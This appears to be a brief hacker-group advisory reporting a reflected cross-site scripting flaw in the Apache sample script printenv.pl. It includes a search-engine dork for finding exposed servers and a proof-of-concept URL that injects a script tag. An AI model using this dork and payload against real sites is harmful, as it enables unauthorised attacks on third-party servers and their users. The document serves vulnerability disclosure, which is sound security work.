printenv.pl is vulnerable to cross site scripting attacks.
758246a0cd632c7a9c7bb7e8c0d7fbf53ed1ca3d0c7b1f6484c4989f7ae524aa
################################################################################
#...:::::printenv.pl(all versions) cross site scripting Vulnerability::::.... #
################################################################################
Virangar Security Team
www.virangar.org
--------
Discoverd By : hadihadi & black.shadowes
special tnx to:MR.nosrati,MR.hesy,satan,IGI,zahra
& all virangar members & all iranian hackerz
greetz:to my best friend in the world hadi_aryaie2004
-----------------------------------
dork: inurl:/cgi-bin/printenv.pl
-----------------------------------
vlu:
http://www.site.com/cgi-bin/printenv.pl?acuparam=>"><ScRiPt>alert('xss')</ScRiPt>.
-------------------------------------
it's better using IE for test xss vlu
-------------------------------------
coment:
when y0u Installing and configuring Apache or install a local host on your pc
in the cgi-bin folder there is a perl program called printenv.pl
which you can use to test if your Perl installation is working in combination with the Apache HTTP server.
---
i dont know who vendor the printenv.pl